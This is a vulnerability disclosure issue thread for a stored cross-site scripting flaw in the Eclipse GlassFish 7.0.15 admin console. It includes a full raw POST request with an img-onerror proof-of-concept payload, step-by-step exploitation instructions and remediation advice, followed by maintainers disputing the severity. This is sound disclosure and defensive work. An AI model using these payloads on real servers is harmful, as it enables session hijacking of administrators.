Glassfish cross-side scripting in uploadFrame.jsf

Product Line: Eclipse GlassFish

• Vulnerable Version: 7.0.15

• Summary: In Eclipse GlassFish version 7.0.15 is possible to perform Stored Cross-site scripting attacks. Stored cross-site scripting vulnerabilities arise when user input is stored and later embedded into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

• Prerequisites: The attacker must be authenticated within the Administration Console.

Step-by-step instructions and PoC

A remote user, authenticated to the Administration Console, can store malicious JavaScript code within the “description” parameter that is in the “Deploy Application” task. Successfully exploitation of this vulnerability can cause the extraction of some information and/or the execution of arbitrary HTTP Request in the context of victim's session.

Affected Endpoints

• URL: https://[IP]:[PORT]/common/applications/uploadFrame.jsf • HTTP POST Parameter: form:war:psection:descriptionProp:description Below there is the evidence with the vulnerability details and the payloads used. Payload used to exploit the vulnerability:

POST
/common/applications/uploadFrame.jsf?form:title2:bottomButtons:uploadButton=Processing...
&bare=false HTTP/1.1
Host: [IP]:[PORT]
Cookie: […]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------
74657258217273412031077623017
Content-Length: 8343
Origin: https://[IP]:[PORT]
Referer: https://[IP]:[PORT]/common/applications/uploadFrame.jsf
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:sheet1:section1:prop1:hiddenText"
required
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="uploadRdBtn"
client
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:sheet1:section1:prop1:fileupload";
filename="webshell_foo.war"
Content-Type: application/octet-stream
[...]
-----------------------------74657258217273412031077623017
Content-Disposition: form-data;
name="form:sheet1:section1:prop1:fileupload_com.sun.webui.jsf.uploadParam"
form:sheet1:section1:prop1:fileupload
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:sheet1:section1:prop1:extension"
.war
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:sheet1:section1:prop1:action"
client
-----------------------------74657258217273412031077623017
Content-Disposition: form-data;
name="form:sheet1:sun_propertySheetSection223:type:appType"
war
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:appClient:psection:nameProp:appName"
xss-stored
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:appClient:psection:implicitCdi:implicitCdi"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:appClient:psection:jw:jwt"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data;
name="form:appClient:psection:deploymentOrder:deploymentOrder"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:appClient:psection:descriptionProp:description"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:nameProp:appName"
xss-stored
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:enableProp:sun_checkbox236"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:implicitCdi:implicitCdi"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:jw:jwc"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:deploymentOrder:deploymentOrder"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:librariesProp:library"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:ear:psection:descriptionProp:description"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:jar:psection:nameProp:appName"
xss-stored
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:jar:psection:enableProp:sun_checkbox238"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:jar:psection:implicitCdi:implicitCdi"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:jar:psection:deploymentOrder:deploymentOrder"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:jar:psection:librariesProp:library"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:jar:psection:descriptionProp:description"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:rar:psection:nameProp:appName"
xss-stored
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:rar:psection:enableProp:sun_checkbox240"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:rar:psection:implicitCdi:implicitCdi"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:rar:psection:deploymentOrder:deploymentOrder"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:rar:psection:descriptionProp:description"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:cxp:ctx"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:nameProp:appName"
xss-stored
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:enableProp:sun_checkbox242"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:implicitCdi:implicitCdi"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:deploymentOrder:deploymentOrder"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:librariesProp:library"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:war:psection:descriptionProp:description"
"><img src=x onerror=alert(1)>
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:other:psection:nameProp:appName"
xss-stored
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:other:psection:enableProp:sun_checkbox244"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:other:psection:implicitCdi:implicitCdi"
true
-----------------------------74657258217273412031077623017
Content-Disposition: form-data;
name="form:other:psection:deploymentOrder:deploymentOrder"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:other:psection:librariesProp:library"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form:other:psection:descriptionProp:description"
-----------------------------74657258217273412031077623017
Content-Disposition: form-data;
name="form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_item_list"
|server|foo3|foo4|xss-stored|xss|com.sun.webui.jsf.separator|
-----------------------------74657258217273412031077623017
Content-Disposition: form-data;
name="form:targetSection:targetSectionId:addRemoveProp:commonAddRemove_list_value"
server
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="form_hidden"
form_hidden
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="jakarta.faces.ViewState"
2595358235104407692:-2890977101667147833
-----------------------------74657258217273412031077623017
Content-Disposition: form-data; name="com_sun_webui_util_FocusManager_focusElementId"
form:title2:bottomButtons:uploadButton
-----------------------------74657258217273412031077623017--

As a first step, the attacker must be logged in the Administration Console

Then, deploy a new web application in “Applications” tab by inserting the malicious payload in the “description” parameter, as shown below (image)

Finally, as soon as the victim visit the following link, the malicious payload will be executed in the victim’s browser session.

- https://[IP]:[PORT]/management/domain/applications/application/xss-stored

Note that, this vulnerability has been confirmed in various parameters, like “name” in “Protocols” task. As shown below, an attacker can insert a malicious payload in the “protocol name” parameter and when a user visits the following web page, the JavaScript will be executed.

- https://[IP]:[PORT]/management/domain/configs/config/default-config/network-
config/protocols/protocol

Security Impact

An attacker can exploit this vulnerability to extract some information or run arbitrary HTTP Request in the context of victim's session.

Remediation Steps

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

• Input should be validated as strictly as possible on arrival, given the kind of content that it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitized.
• User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task

assigned to @redteamtim, @hsawamura, @smillidge, and @dmisingname3q2

Dear Glassfish team, please have a look at this one @hsawamura @smillidge @dmisingname3q2

Reported: July 15th, 2024

Hi @hsawamura, @smillidge, @dmisingname3q2, we would like to know whether you have any update about this vulnerability. We would like to know whether you can require the reservation of the CVE ID for it. Thank you for cooperation and Best Regards.

Hi team and @mrybczyn, considering the mix-up created through the issue #232 (closed) about the CVE and since you are a CNA, therefore you are responsible for reservation request of CVE IDs and their management, may you keep us up to date regarding this issue please? May you reserve the CVE ID for it and trasmit it to us, please? Thank you and kind regards

Eclipse GlassFish typically requests CVE assignment upon the release of a version containing the fix. As an open-source project with publicly available source code, anyone can contribute fixes and improvements. We welcome your contributions for a swift resolution.

Hi team and @mrybczyn, According to your handbook about the CVEs management (https://www.eclipse.org/projects/handbook/#vulnerability-cve) the procedure is different: The first point of paragraph "General Case" (https://www.eclipse.org/projects/handbook/#general-case), that is called "Request the number", and we quote it "When you know that there is a security issue (the fix is not yet needed at this point), go to the CVE Request form and fill it. Make sure to keep the issue confidential for now. If you want to make the issue visible to multiple project members, add them as assignees when creating the ticket (it will be hard later on)." So you may proceed to require the CVE before you fix the flaws. Then, when the patch is ready, you can publish the CVE, as reported in your handbook in the point "Ask for publication of the issue".

So at this point may you reserve the CVE, please?

Hi team and @mrybczyn, is it possible to reserve the CVE-ID for this issue, please?

@redteamtim, thank you for your patience. We will get back to you early next week.

added vulnerabilityconfirmed label

@hsawamura, @smillidge, @dmisingname3q2 as the researcher requests a CVE ID, we're going to reserve one. If during development of the fix you will find out there's no vulnerability or it comes directly from a dependency (so it is not in your code), we can cancel the reservation (it is called rejection)

In GlassFish, an attacker who gains access to the administration console can deploy and execute malicious Java applications, granting them the ability to perform virtually any action within the Java environment. Partial fixes are ineffective.

Several effective mitigation strategies are already outlined in the security guide. https://glassfish.org/docs/latest/security-guide.html#securing-the-glassfish-server-host

cc) @smillidge @dmisingname3q2

added statusawaiting_project label

Hi team, we would like to know if you have any updates about this item. We would highlight that this vulnerability has been confirmed in various parameters, like “name” in “Protocols” task. As shown below and detailed described in the report, an attacker can insert a malicious payload in the “protocol name” parameter and when a user visits the following web page, the JavaScript will be executed.

- https://[IP]:[PORT]/management/domain/configs/config/default-config/network-
config/protocols/protocol

Thank you and regards

assigned to @atijmse7y

assigned to @omihalyi

assigned to @avpinchuk

assigned to @pygieo

assigned to @kaido207

@atijmse7y @omihalyi @avpinchuk @pygieo @kaido207, please have a look if you can assist in resolving this issue. Please note that this is a GitLab confidential issue and you need to be logged in to see it. Otherwise you will get a 404.

An update has been added by the previous comment from @hsawamura and it’s correct - the requirement to explout this vilnerability is that the attacker already has access to the Admin console. At that time, the same attacker already can do anything with the server, including executing any malicious code on the server. The attacker doesn’t need to exploit another user’s session to do that.

So, in summary, this is not a vilnerability because it requires that an attacker already has all permissions to control the server. GlassFish team doesn’t accept this as a vulnerability. This issue should be raised as a usual issue/defect, not as a security issue.

Hi, this vulnerability is about the XSS on the "description" parameter, that is exploitable as shown below:

Content-Disposition: form-data; name="form:war:psection:descriptionProp:description"
"><img src=x onerror=alert(1)>

Please, check the initial report for further details. Thank you and regards

Hi team, we would like to know if you have any news for this vulnerability. Thank you and regards

Hi @mrybczyn @mbarbero, could you help us to known if you have a release date for this vulnerability? Thank you and regards

Hi team, we would like to know if you have a release date for this vulnerability. Thank you and regards

Hi , we would like to know if you have any news about the release date for the fix. Thank you and best regards.

Greetings @redteamtim , many thanks for reporting!
We're making this issue public since it has passed number of days expected for responsible vulnerability disclosure.
The mitigation on this issue is expected to happen in the future.
Currently the Glassfish committers have a considerable workload on their hands and since this vulnerability requires access to the Administration Console, it has been considered there are greater risks coming from a malicious actor with that type of access.

made the issue visible to everyone

Hi @tiagolucas, thanks for your feedback. We would like to know when you will publish the CVE on MITRE about this issue, since you have published it here. Thank you and regards